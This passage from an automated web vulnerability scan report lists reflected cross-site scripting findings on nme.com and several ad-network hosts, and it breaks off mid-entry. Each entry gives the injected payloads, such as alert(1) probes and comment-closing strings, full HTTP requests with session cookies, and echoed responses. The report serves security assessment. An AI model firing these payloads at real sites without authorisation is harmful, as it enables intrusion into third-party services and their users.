Date: Mon, 09 May 2011 14:05:22 GMT
Connection: close
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:05:22 GMT; path=/; domain=.nme.com
Content-Length: 38330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (adcode5f92a-->a012285e929) -->
...[SNIP]...

3.117. http://www.nme.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4623e-->5187d24571d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico4623e-->5187d24571d HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:07:08 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 95cbd9249f56d01c751526782057b0f9773659d7"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3720"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014960765838623"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:07:08 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:07:08 GMT
Connection: close
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:07:08 GMT; path=/; domain=.nme.com
Content-Length: 38335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (favicon.ico4623e-->5187d24571d) -->
...[SNIP]...

3.118. http://www.nme.com/hotspot/channel/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /hotspot/channel/news

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b0c83-->8f638c4fb79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hotspotb0c83-->8f638c4fb79/channel/news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:06:55 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 71377e3929ad2c9d7c33f66221ca8d2eecc2c7e2"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 23|[{"Type":"LOG"},"cs: "]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3480"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 39|[{"Type":"LOG"},"ts: 0.14782190322876"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:06:56 GMT
Date: Mon, 09 May 2011 14:06:56 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 38328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (hotspotb0c83-->8f638c4fb79) -->
...[SNIP]...

3.119. http://www.nme.com/news/sufjan-stevens/56527 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3224f-->39280491a0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news3224f-->39280491a0b/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:53 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: d61b71039b6d7937222aa72b09ebd0b3767435a0"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3720"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 39|[{"Type":"LOG"},"ts: 0.22853589057922"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:00:53 GMT
Date: Mon, 09 May 2011 14:00:53 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:53 GMT; path=/; domain=.nme.com
Content-Length: 38326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (news3224f-->39280491a0b) -->
...[SNIP]...

3.120. http://ib.adnxs.com/ttj [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d55b5'-alert(1)-'503ac68ed32 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d55b5'-alert(1)-'503ac68ed32
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCg6Z_uBBCg6Z_uBBgB; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:05:20 GMT
Content-Length: 673

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=_-cwX16AyT__5zBfXoDJPwAAACAEVvI__-cwX16A
...[SNIP]...
jC6AIQo6ULGAAg8dUBKAAx_-cwX16AyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EKa3AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.google.com/search%3Fhl=en%26q=d55b5'-alert(1)-'503ac68ed32">
...[SNIP]...

3.121. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57ab9'%3balert(1)//75a18298652 was submitted in the cli cookie. This input was echoed as 57ab9';alert(1)//75a18298652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e57ab9'%3balert(1)//75a18298652; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:25 GMT
Connection: close
Content-Length: 7252

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30374648_1304949625","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news;net=q1;u=,q1-30374648_1304949625,11f8f328940989e57ab9';alert(1)//75a18298652,polit,am.h-am.b;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;ord=949612198?","300","250",false);</scr'+'ipt>
...[SNIP]...

3.122. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 286a4'%3balert(1)//be060bc01e5 was submitted in the cli cookie. This input was echoed as 286a4';alert(1)//be060bc01e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e286a4'%3balert(1)//be060bc01e5; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7800

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-73291953_1304949599","http://ad.doubleclick.net/adj/q1.q.gc.6170/news;net=q1;u=,q1-73291953_1304949599,11f8f328940989e286a4';alert(1)//be060bc01e5,polit,am.h-am.b;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;ord=949588501?","728","90",false);</scr'+'ipt>
...[SNIP]...

3.123. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1bb2"%3balert(1)//32ec09e96ad was submitted in the cli cookie. This input was echoed as a1bb2";alert(1)//32ec09e96ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989ea1bb2"%3balert(1)//32ec09e96ad; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:58 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Content-Length: 7798

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=698857285;redirect=http://a.collective-media.net/datapair?net=qc&id=11f8f328940989ea1bb2";alert(1)//32ec09e96ad&segs=!qcsegs&op=add",true);CollectiveMedia.addPixel("http://load.exelator.com/load/?p=104&g=210&j=0",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);CollectiveM
...[SNIP]...

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload a192f<script>alert(1)</script>b5cb7f113c8 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046a192f<script>alert(1)</script>b5cb7f113c8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046a192f<script>alert(1)</script>b5cb7f113c8', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12
...[SNIP]...

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload f54bf<script>alert(1)</script>340b005e8ea was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

